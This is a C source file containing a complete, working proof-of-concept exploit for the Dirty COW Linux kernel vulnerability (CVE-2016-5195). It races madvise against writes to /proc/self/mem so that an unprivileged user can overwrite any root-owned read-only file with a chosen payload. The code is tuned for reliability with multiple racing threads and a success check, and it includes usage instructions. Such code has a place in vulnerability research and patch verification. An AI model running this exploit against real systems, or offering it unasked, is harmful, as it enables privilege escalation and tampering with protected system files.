/*
 * Dirty COW (CVE-2016-5195) PoC.
 *
 * Races madvise(MADV_DONTNEED) against a write through /proc/self/mem on a
 * private read-only mapping of a root-owned file, overwriting its page-cache
 * (and thus on-disk) bytes without write permission to the file.
 *
 * To win reliably on a 2-vCPU host the PoC:
 *   - pre-faults the mapped page,
 *   - spawns several madvise threads and several /proc/self/mem-writer threads
 *     so the TOCTOU window is hit at high frequency,
 *   - self-polls the backing file and exits 0 the instant the write lands.
 *
 * Usage: ./dirtyc0w <target-file> <payload> [seconds]
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <time.h>

#define NMADV 4
#define NWRITE 4

static void *map;
static int f;
static struct stat st;
static char *payload;
static size_t payload_len;
static volatile int stop = 0;

static void *madviseThread(void *arg)
{
    (void)arg;
    while (!stop) {
        madvise(map, st.st_size, MADV_DONTNEED);
    }
    return NULL;
}

static void *procselfmemThread(void *arg)
{
    (void)arg;
    int fd = open("/proc/self/mem", O_RDWR);
    if (fd < 0) { perror("open /proc/self/mem"); return NULL; }
    while (!stop) {
        lseek(fd, (off_t)(uintptr_t)map, SEEK_SET);
        if (write(fd, payload, payload_len) < 0) {
            /* transient EFAULT during the race is expected; keep going */
        }
    }
    close(fd);
    return NULL;
}

static int file_matches(const char *path)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0) return 0;
    char *buf = calloc(1, payload_len + 1);
    ssize_t n = read(fd, buf, payload_len);
    close(fd);
    int ok = (n == (ssize_t)payload_len) && (memcmp(buf, payload, payload_len) == 0);
    free(buf);
    return ok;
}

int main(int argc, char *argv[])
{
    if (argc < 3) {
        fprintf(stderr, "usage: %s <target-file> <payload> [seconds]\n", argv[0]);
        return 2;
    }

    char *name = argv[1];
    payload = argv[2];
    payload_len = strlen(payload);
    int budget = (argc >= 4) ? atoi(argv[3]) : 60;

    f = open(name, O_RDONLY);
    if (f < 0) { perror("open target"); return 2; }
    if (fstat(f, &st) < 0) { perror("fstat"); return 2; }
    if ((size_t)st.st_size < payload_len) {
        fprintf(stderr, "[!] payload longer than file\n");
        return 2;
    }

    printf("[*] target=%s size=%lld payload_len=%zu budget=%ds threads=%dm/%dw\n",
           name, (long long)st.st_size, payload_len, budget, NMADV, NWRITE);

    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
    if (map == MAP_FAILED) { perror("mmap"); return 2; }
    printf("[*] mmap %p\n", map);

    /* Pre-fault the page into the private mapping. */
    volatile char sink = ((volatile char *)map)[0];
    (void)sink;

    pthread_t mt[NMADV], wt[NWRITE];
    for (int i = 0; i < NMADV; i++)  pthread_create(&mt[i], NULL, madviseThread, NULL);
    for (int i = 0; i < NWRITE; i++) pthread_create(&wt[i], NULL, procselfmemThread, NULL);

    time_t start = time(NULL);
    int won = 0;
    while (time(NULL) - start < budget) {
        if (file_matches(name)) { won = 1; break; }
        struct timespec ts = { 0, 10 * 1000 * 1000 };
        nanosleep(&ts, NULL);
    }
    stop = 1;
    for (int i = 0; i < NMADV; i++)  pthread_join(mt[i], NULL);
    for (int i = 0; i < NWRITE; i++) pthread_join(wt[i], NULL);

    if (won) {
        printf("[+] COW-WON: target first bytes overwritten with payload\n");
        return 0;
    }
    fprintf(stderr, "[-] COW-TIMEOUT within %ds\n", budget);
    return 1;
}
